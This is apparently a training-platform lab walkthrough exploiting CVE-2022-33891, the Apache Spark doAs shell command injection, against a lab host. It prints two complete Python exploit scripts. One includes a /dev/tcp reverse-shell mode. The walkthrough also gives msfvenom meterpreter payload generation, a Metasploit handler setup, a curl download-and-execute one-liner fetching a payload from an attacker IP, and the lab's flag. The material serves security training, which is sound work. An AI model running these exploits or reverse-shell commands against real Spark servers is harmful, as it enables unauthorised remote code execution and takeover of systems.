Lab Walkthrough - Apache Spark Shell Command Injection
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Purpose: Learn how to exploit Apache Spark using the Metasploit Framework, and use Python to write and modify scripts that exploit the Apache Spark application.
Technical difficulty: Beginner
Introduction
In 2022, a critical shell command injection vulnerability was found in the Apache Spark server. The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that ultimately builds a Unix shell command based on their input and executes it. This results in arbitrary shell command execution as the user Spark is currently running as.
This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
The vulnerability was discovered by Kostya Kortchinsky, a cybersecurity researcher from Databricks.
Read More: https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc
What is Command Injection?
Command injection is a cyberattack in which unauthorized commands are run on the host operating system. Usually, the threat actor injects the commands by taking advantage of an application flaw, such as inadequate input validation.
Lab Environment
In this lab environment, the user gets access to a Kali GUI instance. A vulnerable Apache Spark instance is deployed at http://demo.ine.local:8080
Goal after completing this scenario: Access the /flag.txt file and read the flag!
Tools
The best tools for this lab are:
Nmap
Bash Shell
Metasploit Framework
Python
What is Apache Spark?
Apache Spark is a multi-language engine for executing data engineering, data science, and machine learning on single-node machines or clusters.
Apache Spark Key features
Batch/streaming data
Unify the processing of your data in batches and real-time streaming, using your preferred language: Python, SQL, Scala, Java or R.
SQL analytics
Execute fast, distributed ANSI SQL queries for dashboarding and ad-hoc reporting. Runs faster than most data warehouses.
Data science at scale
Perform Exploratory Data Analysis (EDA) on petabyte-scale data without having to resort to downsampling
Machine learning
Train machine learning algorithms on a laptop and use the same code to scale to fault-tolerant clusters of thousands of machines.
Source: https://spark.apache.org/
Vulnerability Configuration
The vulnerability is only reachable when ACLs are enabled via the configuration option spark.acls.enable, e.g., by setting it to true in conf/spark-defaults.conf
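Vulnerable Source Code
The snippet below is the diff of the fix: the lines prefixed with - are the vulnerable code, which passes the user name to bash inside a single command string, and the line prefixed with + is the patched code, which calls id directly with the user name as a separate argument.
  private def getUnixGroups(username: String): Set[String] = {
-   val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
    // we need to get rid of the trailing "\n" from the result of command execution
-   Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+   Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
  }
}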
CVE-2022-33891
Vulnerable parameter
http://demo.ine.local:8080/?doAs=`[command injection here]`
The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by building a raw Linux shell command from that value.
Commands are injected through the ?doAs parameter, and nothing is reflected back on the page during command execution, so this is a blind OS command injection. Your commands run, but there is no indication of whether they worked, or even whether the program you are running exists on the target.
A value passed in the ?doAs URL parameter reaches getUnixGroups, which builds cmdSeq and spawns a background bash process with the command line id -Gn followed by that value. Anything the value wraps in backticks is therefore executed by bash before id runs.
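To make the difference between the vulnerable and the patched call concrete, here is a minimal Python sketch of the two ways the id command line can be assembled. It is not Spark's code: the function names, the /usr/bin/id default path, and the sample payload are assumptions for illustration. Nothing is executed; the argument vectors are only built and printed.

```python
def vulnerable_argv(username: str) -> list:
    """Mirror of the pre-patch logic: the user name is concatenated into one
    string that bash parses, so backticks and other metacharacters are live."""
    return ["bash", "-c", "id -Gn " + username]


def patched_argv(username: str, id_path: str = "/usr/bin/id") -> list:
    """Mirror of the patched logic: id is invoked directly and the user name
    is a single argv element, so no shell ever interprets it."""
    return [id_path, "-Gn", username]


# Hypothetical attacker-supplied doAs value (illustration only).
payload = "`touch /tmp/pwned`"

print(vulnerable_argv(payload))  # bash would run the backtick command first
print(patched_argv(payload))     # id would just see an odd-looking user name
```

In the first form the payload becomes part of the text that bash interprets; in the second it stays an opaque argument to id.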
Solution
Step 1: Open the lab link to access the Kali machine.
Kali machine
Step 2: Check if the provided machine is reachable.
Command:
ping -c 4 demo.ine.local
The provided machine is reachable.
Step 3: Check all open ports on the machine.
Command:
nmap demo.ine.local
Multiple ports are open. The Apache Spark server is running on port 8080.
Step 4: Open the Firefox browser and access port 8080 to identify the Apache Spark server version.
URL: http://demo.ine.local:8080
The target Apache Spark server version is 3.1.1.
Step 5: Run a command on the target using the vulnerable parameter "?doAs".
Request the URL below from the Kali machine, for example with curl in the terminal. Wrap the URL in single quotes so that the local shell does not expand the backticks itself.
URL:
http://demo.ine.local:8080?doAs=`id`
Successfully executed the id command on the target server and received a response.
Note: You won't receive the output of all Linux commands.
This confirms that the target is vulnerable to CVE-2022-33891.
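The request from this step can also be prepared in Python. The sketch below only builds the URL; the helper name build_doas_url is hypothetical, and it assumes the server URL-decodes the doAs value before using it, as web servers normally do. Percent-encoding the payload avoids any local shell or HTTP client mangling the backticks.

```python
from urllib.parse import quote


def build_doas_url(base_url: str, command: str) -> str:
    """Return a URL whose doAs value is the command wrapped in backticks,
    percent-encoded so it survives the trip to the server unchanged."""
    payload = f"`{command}`"
    return f"{base_url.rstrip('/')}/?doAs={quote(payload, safe='')}"


print(build_doas_url("http://demo.ine.local:8080", "id"))
```

The resulting string can be passed to requests.get or to curl inside single quotes.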
Step 6: Write an Nmap script that detects the vulnerable Spark version, i.e., 3.1.1
Nmap script
-- The Head Section --
description = [[The script to detect The Apache Spark Shell Command Injection vulnerability]]
---
-- @usage
-- nmap --script detect-spark-vuln <target>
-- @output
-- PORT STATE SERVICE
-- 8080/tcp open http
-- |_detect-spark-vuln: Apache Spark is Vulnerable to Command Injection!!
categories = {"default", "safe"}
local shortport = require "shortport"
local http = require "http"
local string = require "string"
-- The Rule Section --
portrule = shortport.http
-- The Action Section --
action = function(host, port)
  local uri = "/"
  local text1 = "3.1.1"
  local response = http.get(host, port, uri)
  -- Only inspect successful responses that actually carry a body
  if response and response.status == 200 and response.body then
    -- Plain-text search (4th argument true), so the dots in "3.1.1"
    -- are not treated as Lua pattern wildcards
    if string.find(response.body, text1, 1, true) then
      return "Apache Spark is Vulnerable to Command Injection!!"
    else
      return "Apache Spark Not Vulnerable!!"
    end
  end
end
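The script is pretty straightforward. It requests the root page on the target's HTTP port (8080 in this lab), searches the response body for the given string, i.e., 3.1.1, and reports whether the target looks vulnerable. Note that it only matches the version banner and does not attempt the injection itself.
Save the above code on the attacker's machine and run it. The file extension should be .nse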
Commands:
nano detect-spark-vuln.nse
<paste code>
Run the script.
nmap --script detect-spark-vuln.nse demo.ine.local
Successfully detected the Apache Spark server version 3.1.1 using a custom Nmap script.
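The Nmap script matches a single version string. As a rough sketch of a broader check, the Python snippet below encodes the affected ranges exactly as listed in the introduction (3.0.3 and earlier, 3.1.1 to 3.1.2, 3.2.0 to 3.2.1). The function names are hypothetical, and the parser assumes a plain dotted numeric version; a suffix such as "-SNAPSHOT" would raise a ValueError.

```python
def parse_version(version: str) -> tuple:
    """Turn a dotted version such as '3.1.1' into a comparable tuple."""
    return tuple(int(part) for part in version.split("."))


# Inclusive (low, high) ranges taken from the advisory text quoted earlier.
AFFECTED_RANGES = [
    ((0, 0, 0), (3, 0, 3)),
    ((3, 1, 1), (3, 1, 2)),
    ((3, 2, 0), (3, 2, 1)),
]


def is_affected(version: str) -> bool:
    """Return True if the version falls inside one of the affected ranges."""
    parsed = parse_version(version)
    return any(low <= parsed <= high for low, high in AFFECTED_RANGES)


for candidate in ("3.1.1", "3.1.3", "3.3.0"):
    print(candidate, is_affected(candidate))
```

A version match is only an indicator: the target is exploitable only if ACLs are also enabled.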
Step 7: Run a Python script to detect the Apache Spark Command Injection vulnerability
Python Script
#!/usr/bin/env python3
import sys
import requests
import argparse
import base64
import datetime
from colorama import Fore

parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
parser.add_argument('--verbose', default=False, action="store_true", help="Verbose mode")
args = parser.parse_args()

# nothing to see here, move along!
headers = {
    'User-Agent': 'CVE-2022-33891 POC',
}

# Colors :D
info = (Fore.BLUE + "[*] " + Fore.RESET)
recc = (Fore.YELLOW + "[*] " + Fore.RESET)
good = (Fore.GREEN + "[+] " + Fore.RESET)
important = (Fore.CYAN + "[!] " + Fore.RESET)
printError = (Fore.RED + "[X] " + Fore.RESET)

full_url = f"{args.url}:{args.port}"


def check_for_vuln(url):
    try:
        print(info + "Attempting to connect to site...")
        r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False, headers=headers)
        if args.verbose:
            print(info + f"URL request: {url}/?doAs='testing'")
            print(info + f"Response status code: {r.status_code}")
        if r.status_code != 403:
            print(printError + "No ?doAs= endpoint. Does not look vulnerable.")
            sys.exit(1)
        elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
            print(printError + "Does not look like an Apache Spark server.")
            sys.exit(1)
        else:
            print(important + "Performing sleep test of 10 seconds...")
            t1 = datetime.datetime.now()
            if args.verbose:
                print(info + f"T1: {t1}")
            run_cmd("sleep 10")
            t2 = datetime.datetime.now()
            delta = t2-t1
            if args.verbose:
                print(info + f"T2: {t2}")
                print(info + f"Delta T: {delta.seconds}")
            if delta.seconds not in range(8,12):
                print(printError + "Sleep was less than 10. This target is probably not vulnerable")
            else:
                print(good + "Sleep was 10 seconds! This target is probably vulnerable!")
            sys.exit(0)
    except Exception as e:
        print(printError + str(e))


def cmd_prompt():
    cmd = input("[cve-2022-33891> ")
    return cmd


def base64_encode(cmd):
    try:
        message_bytes = cmd.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_cmd = base64_bytes.decode('ascii')
        return base64_cmd
    except Exception as e:
        print(printError + str(e))


def run_cmd(cmd):
    try:
        if args.verbose:
            print(info + "Command is: " + cmd)
        base64_cmd = base64_encode(cmd)
        if args.verbose:
            print(info + "Base64 command is: " + base64_cmd)
        exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
        exploit_req = f"{full_url}{exploit}"
        if args.verbose:
            print(info + "Full exploit request is: " + exploit_req)
            print(info + "Sending exploit...")
        r = requests.get(exploit_req, allow_redirects=False, headers=headers)
        if args.verbose:
            print(info + f"Response status code: {r.status_code}\n"+ info + "Hint: 403 is good.")
    except Exception as e:
        print(printError + str(e))
        sys.exit(1)


def revshell(lhost, lport):
    print(info + f"Reverse shell mode.\n" + recc+ f"Set up your listener by entering the following:\nnc -nvlp {lport}")
    input(recc + "When your listener is set up, press enter!")
    rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    run_cmd(rev_shell_cmd)


def main():
    try:
        if args.check and args.revshell:
            print(printError + "Please choose either revshell or check!")
            sys.exit(1)
        elif args.check:
            check_for_vuln(full_url)
        # Revshell
        elif args.revshell:
            if not (args.listeninghost and args.listeningport):
                print(printError + "You need --listeninghost and --listeningport!")
                sys.exit(1)
            else:
                lhost = args.listeninghost
                lport = args.listeningport
                revshell(lhost, lport)
        else:
            # "Interactive" mode
            print(info + "\"Interactive\" mode!\n" + important + "Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
            while True:
                command_to_run = cmd_prompt()
                run_cmd(command_to_run)
    except KeyboardInterrupt:
        print("\n"+ info + "Goodbye!")


if __name__ == "__main__":
    main()
Copy and paste the above code into a file named PoC.py on the Kali machine and run it to check whether the target is vulnerable.
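The run_cmd function in the script above does not send the command as-is. It base64-encodes it and lets the target decode it and pipe it into bash, so spaces, quotes, and redirections in the command do not have to survive inside the URL. The standalone sketch below isolates that wrapping step; the names wrap_command and unwrap_command are hypothetical, and the decoder exists only to inspect a payload locally.

```python
import base64


def wrap_command(command: str) -> str:
    """Build the backtick payload: the target decodes the base64 text
    and pipes the result into bash."""
    encoded = base64.b64encode(command.encode("ascii")).decode("ascii")
    return f"`echo {encoded} | base64 -d | bash`"


def unwrap_command(payload: str) -> str:
    """Recover the original command from a wrapped payload (inspection only)."""
    encoded = payload.split()[1]  # second token is the base64 text
    return base64.b64decode(encoded).decode("ascii")


wrapped = wrap_command("sleep 10")
print(wrapped)
print(unwrap_command(wrapped))
```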
Check the script help option.
Command:
python3 PoC.py --help
Running the script to verify the vulnerability.
Command:
python3 PoC.py -u http://demo.ine.local -p 8080 --check --verbose
Target appears to be vulnerable.
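Because the injection is blind, the --check option infers success from timing: it injects sleep 10 and measures how long the request takes. The sketch below shows that idea in isolation. It is an approximation rather than the script's exact logic (the script tests whether the whole-second delta falls in range(8, 12)), the function names are hypothetical, and a short local sleep stands in for the HTTP request.

```python
import time


def timed_call(action) -> float:
    """Run a zero-argument callable and return the elapsed seconds."""
    start = time.monotonic()
    action()
    return time.monotonic() - start


def looks_vulnerable(elapsed: float, expected: float = 10.0, tolerance: float = 2.0) -> bool:
    """Treat the target as probably vulnerable when the response delay is
    close to the injected sleep duration."""
    return abs(elapsed - expected) <= tolerance


# Stand-in for the exploit request: a 0.2 second local sleep.
elapsed = timed_call(lambda: time.sleep(0.2))
print(looks_vulnerable(elapsed, expected=0.2, tolerance=0.15))
```

A slow network or a busy server can also delay a response, so a timing match is a strong hint rather than proof.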
Step 8: Write a simpler Python script to execute commands on the target server
Python Script
import argparse
import base64
import sys

import requests

my_parser = argparse.ArgumentParser(description='Apache Spark Command Injection')
my_parser.add_argument('-T', '--URL', type=str, required=True)
args = my_parser.parse_args()
target = args.URL


def shell(target):
    # Drop a trailing slash so the payload path is not doubled
    url = target.rstrip("/")
    # Confirm the Spark UI is reachable before entering the command loop
    r = requests.get(target)
    if r.status_code == 200:
        print("[+] Exploiting")
        print("[+] Getting the shell... :)")
        while True:
            try:
                command = input("# ")
                # Base64-encode the command so special characters survive inside the URL
                command_to_encode = command.encode('ascii')
                base64_format = base64.b64encode(command_to_encode)
                base64_final_cmd = base64_format.decode('ascii')
                print("Base64 Command: " + base64_final_cmd)
                payload = f"/?doAs=`echo {base64_final_cmd} | base64 -d | bash`"
                exploiting = f"{url}{payload}"
                print(exploiting)
                r = requests.get(exploiting, allow_redirects=False)
                # The injection is blind: this only means the request was sent
                print("Command Executed")
            except KeyboardInterrupt:
                sys.exit("\nBye")
    else:
        print("[*] Some issue occurred.")


shell(target)
Copy and paste the above code into a file named New-PoC.py on the Kali machine. We will use it to gain a meterpreter shell.
Check the Attacker Machine IP address:
Command:
ip addr
Generate the malicious .elf executable for the reverse connection.
Command:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.27.2 LPORT=4444 -f elf > shell.elf
file shell.elf
Start a simple Python HTTP server to serve the shell.elf file.
Command:
python3 -m http.server 80
Start Metasploit multi-handler for the new meterpreter session.
Command:
msfconsole -q
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.27.2
exploit
Check if the script is running correctly by checking its help option.
Command:
python3 New-PoC.py --help
It's working fine. Run the script, then exploit the vulnerability to download the shell.elf file to the target machine with curl and execute it.
Command:
python3 New-PoC.py --URL http://demo.ine.local:8080
Command (entered at the script's # prompt):
curl http://10.10.27.2/shell.elf --output /tmp/shell.elf; chmod +x /tmp/shell.elf; /bin/bash -c "/tmp/shell.elf"
The shell.elf file was downloaded to the /tmp/ directory and executed on the target machine. After it ran, we received a meterpreter session:
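The one-line stager typed at the prompt chains three actions: download, mark as executable, and run. As a small sketch, the Python helper below assembles the same string from its parts, which is handy when the attacker IP or file name changes. The helper name build_stager and its parameters are hypothetical.

```python
def build_stager(lhost: str, filename: str = "shell.elf", dest_dir: str = "/tmp") -> str:
    """Assemble the download-and-execute one-liner used in this step."""
    dest = f"{dest_dir}/{filename}"
    steps = [
        f"curl http://{lhost}/{filename} --output {dest}",  # fetch the payload
        f"chmod +x {dest}",                                  # make it executable
        f'/bin/bash -c "{dest}"',                            # run it
    ]
    return "; ".join(steps)


print(build_stager("10.10.27.2"))
```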
Step 9: Find the flag.
Command:
ls /
cat /flag.txt
FLAG: aad8ee70c54f1cc0c0aad082423b09fe
Mitigation
Upgrade to a supported Apache Spark maintenance release: 3.1.3, 3.2.2, or 3.3.0 or later.